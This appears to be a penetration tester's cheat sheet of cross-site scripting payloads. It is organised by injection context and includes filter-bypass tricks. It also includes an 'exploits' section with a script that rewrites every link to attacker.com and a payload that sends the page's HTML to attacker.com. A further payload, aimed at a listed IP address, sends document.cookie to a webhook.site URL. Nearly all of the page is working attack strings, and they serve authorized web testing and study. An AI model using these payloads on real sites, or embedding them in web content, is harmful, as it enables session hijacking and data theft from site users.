XSS

https://github.com/payloadbox/xss-payload-list

IMPORTANT TIP: Always look at the source code and close the current HTML tag then put JS payload.

<script>print()</script> that will pop up the browser print dialog, which is unlikely to be blocked by any browsers

Tip: Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of window.origin in the alert box, instead of a static value like 1. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.

<script>alert(window.origin)</script>

As some modern browsers may block the alert() JavaScript function in specific locations, it may be handy to know a few other basic XSS payloads to verify the existence of XSS. One such XSS payload is <plaintext>, which will stop rendering the HTML code that comes after it and display it as plaintext.

<script>alert(1)</script>

Check the reflected text and make a query appropriately!

<img src=a onerror=alert("xss")>

<BODY ONLOAD=javascript:alert(1)>

If alert() is being filtered

eval("ale" + "rt('xss')")

If <> brackets are fiiltered.

"onmouseover="alert(1)

If single quotes are filtered '

Use double quotes and vice versa

One stop payload!!

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links

Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});

Source Code Stealer

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

XSS with "unsafe" reflecting. Here is a valid payload. This is a markdown HTML injection

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

Reaching our own server using XSS and stealing sensitive information

http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E

Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>

Further,

Last updated

Was this helpful?